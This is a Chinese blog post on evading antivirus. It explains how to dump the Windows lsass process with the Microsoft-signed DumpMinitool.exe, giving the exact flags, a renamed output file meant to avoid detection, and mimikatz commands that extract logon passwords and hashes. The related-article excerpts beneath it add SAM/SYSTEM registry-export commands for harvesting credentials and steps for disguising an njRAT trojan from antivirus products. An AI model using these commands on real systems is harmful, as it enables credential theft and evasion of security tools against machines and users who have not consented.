微软自带签名exe,免杀dump hash

已于 2022-05-06 15:17:05 修改
阅读量1.2k 收藏 2
点赞数 2
分类专栏: 免杀 文章标签: 安全
于 2022-04-16 12:09:27 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44747030/article/details/124211388
版权

微软签名DumpMinitool.exe,免杀dump hash

微软签名的exe

在这里插入图片描述

dump lsass进程

DumpMinitool.exe --file 1.txt --processId 948 --dumpType Full

--file 保存文件名为1.txt 规避一下杀软
--processId  lsass.exe 进程号

杀软无拦截

在这里插入图片描述

查看1.dmp

sekurlsa::minidump "1.dmp"

sekurlsa::logonpasswords

在这里插入图片描述

参考文章:https://mp.weixin.qq.com/s/Q3XKEciDJggUqMHMc9Zdnw

evilxpl
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
expressor1.5.0.1变异免杀补丁
03-18
expressor1.5.0.1变异免杀补丁
绕过查杀工具实现lsass转储
stars的博客
05-01 936
最近看到mrd0x分享了一个程序通过此程序执行命令获取lsass转储文件,此文件是vs2022里的DumpMinitool.exe。此程序路径为: C:\ProgramFiles\MicrosoftVisualStudio\2022\Community\Common7\IDE\Extensions\TestPlatform\Extensions 接下来测试一下效果,先看一下程序信息 查看数字签名发现是微软,到这已经可以预见测试效果了,接下来开始正式测试。 使用火绒对程序扫描: 使用程
实战shell免杀&C2远控&工具魔改(免杀日记 - 上篇)
最新发布
guanjian_ci的博客
06-05 1462
1、上面实验内容并不多,但是工具的使用、环境的安装、代码的排错够新手玩上几天了。2、绕过杀毒软件的本质就是防止被杀毒库匹配,代码、工具指纹等等!3、一个好的免杀,一定具备了多方面的性能:防杀软、绕过流量平台、防沙箱、防逆向调试后依然能够正常运行上线!4、此文章分上 、 中 、下,未完待续... ...
绕过杀软(二)——免杀exe文件(360、火绒免杀
热门推荐
W小哥
06-12 1万+
攻击机: win7 IP: 192.168.32.134 靶机: windows server 2012(安装360、火绒) IP: 192.168.32.133第一步:使用njRAT生产一个客户端exe木马 输入回连端口号8888,点击start 配置客户端木马的回连地址:192.168.32.134 将文件保存在桌面 开启360杀毒,直接报毒,不免杀 1、将生成的客户端木马:Server.exe在 Encryption Tool V3.0中以base64加密方式打开 打开之后,将base6
免杀对抗-成品EXE免杀-反特征码-通用跳转
xiaoheizi的博客
10-04 1534
1.将工具和exe程序放到环境中,启动程序,点击制作测试文件---选择exe程序,点击ok后会在工具目录下生成一个virtest.vir文件。因为目标使用的是火绒,所以我们自己搭建一个火绒环境,使用VirTest工具检测出exe程序的什么地方被火绒杀了。所以需要再次修改特征码处:将保存了00区间修改的exe程序拖入ollydbg工具中,搜索定位特征码汇编地址后四位。22.开启火绒检测,只保存了00区间修改的半成品被杀了。9.定位到特征码处,向下滑动一下,然后选中复制,将特征码的汇编地址保存起来。
免杀】木马免杀制作
网络安全从业者的学习笔记
03-25 1733
免杀就是指能够使病毒木马逃避杀毒软件检测的一种技术。总体来讲,免杀分为静态免杀和动态免杀,静态免杀基于特征值,而动态免杀则是基于行为。这里我们讲Cobalt Strike生成Python木马,免杀绕过火绒。
运行exe程序崩溃时dump调试Bug
11-16
我们写好的程序在生成exe后,直接运行exe程序崩溃了,但又不好断点调试exe程序,除了在程序中添加log进行查看,还有一种实用的方法就是dump调试,专门针对exe运行崩溃的一种调试。它可以在exe崩溃后自动生成一个dump...
DUMP数据分析助手.exe
07-08
可用于分析dump文件十六进制数的按位取反,十进制换算,二进制换此算和逆位的十六进制数换算,二进制换算。还可以进行和和异或计算,可以添加运算数进行更多计算。文件对比:自动对比。有能力的可以获得vip功能。/...
lsassdump_Lsass.exe_lsassexedump_lsass.dump_dump_dumphash_
09-29
dump lsass.exe 进程
class-dump, class-dump-z.exe,class-dump-z win版本
01-19
class-dump, class-dump-z.exe,class-dump-z win版本
mysql-bin-mysql&dump.exe
08-26
mysql的命令行工具mysql.exe&mysqldump.exe
免杀exe技术探讨
goddemon
07-19 1163
本文章仅用于渗透交流学习,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任最近把大部分的语言的捣鼓分析了下c的python的rust的go的常见的语言市面上有的都研究了下也写了一下自己的发觉python的确实可以说是最简单的了,不过其实深入免杀的话还是得进程注入走ring0层去对抗杀软,不然单纯的静态过了终究有些行为还是会呗动态杀这篇分享一篇python的吧效果看正文全过的也有不过现在肯定是不会发的。...
Exp3-免杀原理与实践-20202127
qq_57435798的博客
03-29 578
本此实验遇到的比较大的问题就是veil的安装,当时反复出现wine32缺失的报错,按照系统给的命令操作之后,却又一直卡在某一行,我也不知道是这一步就应该等待这么久还是我的操作出现了问题,反复多次尝试之后,我在操作到那一步之后,出去吃了顿晚饭,回来之后就惊喜地发现veil已经安装完毕,由此,我也确定了我的操作并没有问题,只是确实需要等待很久。同时,由于恶意代码也会随着科技进步发展变化,只能说是最大程度地去防止恶意代码,而且不同的杀软有不同的性能,对于恶意代码的防范也有一定的局限性,所以绝对是很难做到的!
厉害!免杀任意EXE
南迪叶先森
07-06 2987
公粽号:黒掌 一个专注于分享网络安全、黑客圈热点、黑客工具技术区博主! PE文件 PE文件简述 PE文件的全称是Portable Executable,意为可移植的可执行的文件,常见的EXE、DLL、OCX、SYS、COM都是PE文件,PE文件是微软Windows操作系统上的程序文件(可能是间接被执行,如DLL),这篇文章主要讲对EXE文件进行内存加载并运行的方法,代码实现,和完成一个GUI加载器工具的全过程。 文件结构 由上图可以 Dos Header 是用来兼容MS-DOS操作系统的,目的是当.
红队培训班作业 | 免杀过360和火绒 四种方法大对比
Ms08067安全实验室
08-16 2890
文章来源|MS08067 红队培训班第12节课作业本文作者:汤浩荡(红队培训班1期学员)按老师要求尝试完成布置的作业如下:环境准备:Kali linux安装cs4.2,Windows7系统...
隐藏system窗口你也行(就是那个cmd窗口,好多方法)
冷月醉雪的博客
07-26 1万+
1. WinExec(LPCSTR, UInt)函数        其第一个参数相当于system函数的参数,第二个参数可以设置窗口是否显示,SW_HIDE这个宏表示隐藏窗口,例如:        WinExec(cmd.c_str(),SW_HIDE);//cmd(string类型)中为我们要调用的程序名及其参数, 如 “dir *.exe ”       但是这个有一个问题,这个函数创建...
免杀方法(九)msf加密壳免杀
qq_56426046的博客
10-04 521
仅供安全研究与学习之用,若将工具做其他用途,由使用者承担全部法律及连带责任,作者不承担任何法律及连带责任。
mimikatz免杀之通过SAM和System文件抓取密码
m0_47083622的博客
04-19 8583
最近学习使用Mimikatz工具抓取Windows密码时发现Procdump、SQLDumper、DumpMinitool等一系列能导出lsass进程的工具已经被360“拉黑”了。不过还可以通过SAM和System文件抓取密码和Hash,目前测试360和火绒都不会拦截 以下为操作: 利用注册表命令将目标机的sam或者system文件导出 reg save hklm\sam sam.hive reg save hklm\system system.hive 然后将目标机上的sam.hive和syst
dump hash常见方法总结
weixin_44747030的博客
10-01 1350
Dump Hash常见方法总结
procdump.exe 修改dump产生的位置
05-19
可以使用 procdump.exe 的 `-ma` 参数来指定 dump 文件的输出路径和文件名。例如,以下命令将产生一个 dump 文件并将其保存到 C 盘根目录下的 `mydump.dmp` 文件中: ``` procdump.exe -ma -o C:\mydump.dmp <进程ID> ``` 其中,`-ma` 参数表示将整个进程的内存空间都写入 dump 文件,`-o` 参数指定了输出路径和文件名。注意,如果指定的路径不存在,则需要先创建该路径。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值